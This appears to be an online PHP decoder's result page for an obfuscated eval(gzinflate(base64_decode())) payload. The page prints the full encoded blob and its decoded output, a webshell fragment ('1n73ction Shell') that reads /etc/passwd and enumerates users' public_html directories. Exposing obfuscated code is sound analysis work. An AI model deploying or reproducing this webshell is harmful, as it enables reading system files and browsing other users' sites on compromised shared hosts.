Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode("3VRdb9MwFH0Gif9wa1XY0UrTwQNSm6ZICCR4AIk9oW0KbuwshsSObI..
Decoded Output download
echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">"; (
$sm = ini_get('safe_mode') == 0) ?
$sm = 'off': die("Error: Safe_mode = On</td></tr></table>
<div class=\"info\">[__1n73ction <span class=\"gaya\"><a href='?'>".$xName."</a></span> Shell__]</div>
<div class=\"jaya\"> Jayalah Indonesiaku © ".date('Y',time())." ".$xName." ;-) </div>");
set_time_limit(0); @$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die ("[-] Error : Coudn`t Read /etc/passwd</td></tr></table>
<div class=\"info\">[__1n73ction <span class=\"gaya\"><a href='?'>".$xName."</a></span> Shell__]</div>
<div class=\"jaya\"> Jayalah Indonesiaku © ".date('Y',time())." ".$xName." ;-) </div>"); }
$pub = array(); $users = array(); $conf = array();
$i = 0; while(!feof($passwd)){ $str = fgets($passwd);
if ($i > 100){ $pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != '')){ if (is_readable($dirz)){ array_push($users,$username);
array_push($pub,$dirz); } } } $i++; } foreach ($users as $user){ echo '[Found !]
<a href="?y=/home/'.$user.'/public_html">/home/'.$user.'/public_html/</a><br>'; } ?>
Did this file decode correctly?
Original Code
<?php eval(gzinflate(base64_decode("3VRdb9MwFH0Gif9wa1XY0UrTwQNSm6ZICCR4AIk9oW0KbuwshsSObIetTPx37k26bOOBH4CipNG559xzP5zqsnbAsij3jYaykSFsL1jZqr27uWB5Fj3eCkrXhE5aDL1ElG1APHv6ZB5a2IKxprjSUfAgK120TmmewHYLqwR2MLG4qyq+BmW0YO+8d34NZ3d8DH+2WRpVjg9PDyomR22mzM+pKGMrh+bnRXFqX78qo3EWMqpqYlzJg6SiJdReV1u+4zlbzm8+yVYvWZZKTE38HM5q3TRFcZmlaJDD307fxzzwEX8bWcMHq5zVwcgfPTwvXXfYAFsqGbXgX/kimlaLJFkyuDeDzYsExuws2ZBB0LEgZtGY1kSxQvTNvEO/a4X9V67TVvBUxzIdQb7gno9SU4GYHbkJ3NIQQbDzF5cwTBLW8Nb1yn6L8EVLBQ+S/NdD/T2crq7f4/yk9/IgEJz3QfvwCCmdrR4CpDIIrDZwXZtGi1mlXSXuBpzcwjxET0vBYx0mfFoFinM4Xa2I2DnyQjq+CJIt+Pq4taESi4UTod9jbCSsFqQ6cpTxv+jrSGvX6pQvJ9GSp9hZY8qijm2T8sld3OedoZBTvYSbUHjcPi1ZDGkpMPRcdH2oR1lYTOqxgIcE9FuMSpotXXNzckLvlcPUZQ3HJCDDOGd00PT3wc/fu94qmF0OWz+eFLY7bB/19bgnlv8jmA4Ha+9zTv67/A8=")));
?>
Function Calls
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | fe028b12a86c2f7d5b9c8288f6ebce8a |
Eval Count | 1 |
Decode Time | 92 ms |